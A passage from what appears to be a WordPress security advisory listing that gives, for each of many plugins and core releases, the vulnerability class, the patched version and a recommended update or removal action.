Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: wp-publications

Vulnerability: Local File Inclusion
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP Product Review Lite

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: WooCommerce Cart & Floating Cart

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: SMSmaster – Multipurpose SMS Gateway for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Insert or Embed Articulate Content into WordPress

Vulnerability: Directory Traversal
Patched Version: 4.29991
Recommended Action: Update to version 4.29991, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘deleteRedirect’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Cross-Site Request Forgery to Settings Modification
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Cross-Site Request Forgery to Back-Up Deletion
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: Contact Form by Supsystic

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.7.25
Recommended Action: Update to version 1.7.25, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: Not specified in the listing (affected versions: <= 3.3.19)
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.0.2
Recommended Action: Update to version 10.0.2, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: HDW WordPress Video Gallery

Vulnerability: Reflected Cross-Site Scripting via channel parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Slider Feed

Vulnerability: Missing Authorization to Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Myflash

Vulnerability: Remote File Inclusion
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Sensitive Information Exposure
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: CF7 Google Sheets Connector Pro

Vulnerability: Reflected Cross-Site Scripting via ‘code’
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Account Creation
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Not specified in the listing (affected version given as 4.2.12)
Patched Version: 4.2.153
Recommended Action: Update to version 4.2.153, or a newer patched version

Plugin: WP Forms Puzzle Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Unauthorized Account Access and Privilege Escalation
Patched Version: 4.10.8
Recommended Action: Update to version 4.10.8, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_preload_single_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: JetSearch

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2.1
Recommended Action: Update to version 3.1.2.1, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Location Weather – Hourly, Daily Weather Forecast Widget and Weather Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 2.7.26
Recommended Action: Update to version 2.7.26, or a newer patched version

Plugin: Olevmedia Shortcodes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: Missing Authorization
Patched Version: 1.3.70
Recommended Action: Update to version 1.3.70, or a newer patched version

Plugin: WP Google Tag Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Artillery (MASS EMAIL)

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting in FAQ Builder
Patched Version: 4.7.8
Recommended Action: Update to version 4.7.8, or a newer patched version

Plugin: Restricted Site Access

Vulnerability: Sandbox Bypass
Patched Version: 7.4.0
Recommended Action: Update to version 7.4.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.16.2
Recommended Action: Update to version 5.16.2, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 4.5.91
Recommended Action: Update to version 4.5.91, or a newer patched version

Plugin: Cool Timeline (Horizontal & Vertical Timeline)

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Contact Us Page – Contact People

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Yoast Duplicate Post

Vulnerability: SQL Injection
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.9.11
Recommended Action: Update to version 3.9.11, or a newer patched version

Plugin: Booking Calendar – Clockwork SMS

Vulnerability: Not specified in the listing (affected versions: <= 1.0.5)
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WPMK Ajax Finder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 8.3.1
Recommended Action: Update to version 8.3.1, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated Remote Code Execution
Patched Version: 2.4.22
Recommended Action: Update to version 2.4.22, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting via ‘question’
Patched Version: 3.3.9.3
Recommended Action: Update to version 3.3.9.3, or a newer patched version

Plugin: Awesome Weather Widget

Vulnerability: Reflected Cross-Site Scripting via id Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iframe popup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Time-Based TOTP attack to Sensitive Information Exposure
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.1.2
Recommended Action: Update to version 1.5.1.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Sensitive Information Disclosure (affected versions: <= 7.3.11)
Patched Version: 7.3.12
Recommended Action: Update to version 7.3.12, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.46
Recommended Action: Update to version 1.1.46, or a newer patched version

Plugin: WooCommerce Composite Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.7.6
Recommended Action: Update to version 8.7.6, or a newer patched version

Plugin: Accredible Certificates & Open Badges

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cart All In One For WooCommerce

Vulnerability: Cross-Site Request Forgery to Cart Changes
Patched Version: 1.1.11
Recommended Action: Update to version 1.1.11, or a newer patched version

Plugin: MapGeo – Interactive Geo Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: WordPress Easy Custom Js And Css Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Missing Authorization via REST API
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Easy EU Value Added (VAT) Taxes Add-on

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: S3 Video Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 0.98
Recommended Action: Update to version 0.98, or a newer patched version

Plugin: Attendance Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.5.7
Recommended Action: Update to version 0.5.7, or a newer patched version

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: SQL Injection
Patched Version: 3.2.6.8
Recommended Action: Update to version 3.2.6.8, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via button_text_link parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: 2kb Amazon Affiliates Store

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wonder PDF Embed

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VK All in One Expansion Unit

Vulnerability: Stored (Contributor+) Cross-Site Scripting in CTA Post
Patched Version: 9.88.2.0
Recommended Action: Update to version 9.88.2.0, or a newer patched version

Plugin: Team Showcase

Vulnerability: Object Injection
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: Easy Accordion – Responsive Accordion FAQ Builder and Product FAQ

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Store Locator WordPress

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via ‘category_name’, ‘description’, ‘description_2’ parameters
Patched Version: 1.4.10
Recommended Action: Update to version 1.4.10, or a newer patched version

Plugin: SiteOrigin Widgets Bundle

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.51.0
Recommended Action: Update to version 1.51.0, or a newer patched version

Plugin: Email Tracker – Email Tracking Plugin to track Emails for Open and Email Links Click (Compatible with WooCommerce)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Not specified in the listing (affected version given as 3.3.0)
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: NAB Transact

Vulnerability: Payment System Bypass
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Search Everything

Vulnerability: SQL Injection
Patched Version: 7.0.3
Recommended Action: Update to version 7.0.3, or a newer patched version

Plugin: Phone Orders for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: HTML5 Webcam/Screen/Mic Recorder for Video Comments and Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.55.3
Recommended Action: Update to version 1.55.3, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Missing Authorization via wp_ajax_stm_wpcfto_get_settings
Patched Version: 2.9.35
Recommended Action: Update to version 2.9.35, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Arbitrary File Upload
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Admin+ SQL Injection
Patched Version: 2.2.13.1
Recommended Action: Update to version 2.2.13.1, or a newer patched version

Plugin: Raygun

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Flagallery-skins

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Smart Post Show – Post Grid, Post Carousel, Post Slider, Post Timeline, Post Table, and List Category Posts, Latest Posts, Recent Posts, Popular Posts and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.4.19
Recommended Action: Update to version 2.4.19, or a newer patched version

Plugin: Limit Login Attempts Reloaded

Vulnerability: Missing Authorization
Patched Version: 2.25.26
Recommended Action: Update to version 2.25.26, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: CSV injection via a customer’s profile
Patched Version: 1.16.3.6
Recommended Action: Update to version 1.16.3.6, or a newer patched version

Plugin: Popup Like box – Page Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Easy Testimonial Manager

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quotes llama

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘type’
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin widget
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Missing Authorization Checks
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Republish Old Posts

Vulnerability: Cross-Site Request Forgery via rop_options_page
Patched Version: 1.27
Recommended Action: Update to version 1.27, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: Community Events

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Windows Desktop and iPhone Photo Uploader

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PWGRandom

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Table of Contents Plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2212
Recommended Action: Update to version 2212, or a newer patched version

Plugin: Import WP – Export and Import CSV and XML files to WordPress

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Flexible Elementor Panel

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_purgecache_varnish_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP To Do

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Missing Authorization
Patched Version: 3.24.0
Recommended Action: Update to version 3.24.0, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 9.0.16
Recommended Action: Update to version 9.0.16, or a newer patched version

Plugin: Social Rocket – Social Sharing Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: Uji Popup

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via uji_popup_code shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Authenticated PHP4 Upload
Patched Version: 5.11.1
Recommended Action: Update to version 5.11.1, or a newer patched version

Plugin: SMSA Shipping for WooCommerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Download
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Widget Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AFI – The Easiest Integration Plugin

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.63.0
Recommended Action: Update to version 1.63.0, or a newer patched version

Plugin: Coming Soon, Under Construction & Maintenance Mode By Dazzler

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Torro Forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BlossomThemes Email Newsletter

Vulnerability: Missing Authorization
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Vision – Interactive Image Map Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Staff / Employee Business Directory for Active Directory

Vulnerability: Authenticated (Admin+) LDAP Passback
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Admin+) Path Traversal to Arbitrary File Modification
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: SQL Injection
Patched Version: 1.8.10.2
Recommended Action: Update to version 1.8.10.2, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Author+) Open Redirect
Patched Version: 6.9.19
Recommended Action: Update to version 6.9.19, or a newer patched version

Plugin: Portfolio, Gallery, Product Catalog – Grid KIT Portfolio

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Pinterest RSS Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Essential Blocks Pro

Vulnerability: Unauthenticated PHP Object Injection via products
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.03
Recommended Action: Update to version 7.1.03, or a newer patched version

Plugin: Insert Pages

Vulnerability: Contributor+ Arbitrary Posts/Pages Access
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Fast Flow

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Amministrazione Trasparente

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: Featured Image Pro Post Grid

Vulnerability: Reflected Cross-Site Scripting via page
Patched Version: 5.15
Recommended Action: Update to version 5.15, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Font Awesome 4 Menus

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.6.1
Recommended Action: Update to version 1.0.6.1, or a newer patched version

Plugin: Eupago Gateway For Woocommerce

Vulnerability: Cross-Site Request Forgery via eupago_page_content
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Unauthenticated Remote Command Execution
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Core: WordPress

Vulnerability: Username Enumeration via Error Messages
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Food Store – Online Food Delivery & Pickup

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_transaction_id’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: WP-CopyProtect [Protect your blog posts]

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Contact Form, Drag and Drop Form Builder Plugin – Live Forms

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: MSync

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Social Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Unauthenticated Views Changes
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via header_tag
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy2Map

Vulnerability: Directory Traversal and Local File Inclusion
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Advanced Text Widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Convert to Blocks

Vulnerability: Prototype Pollution
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

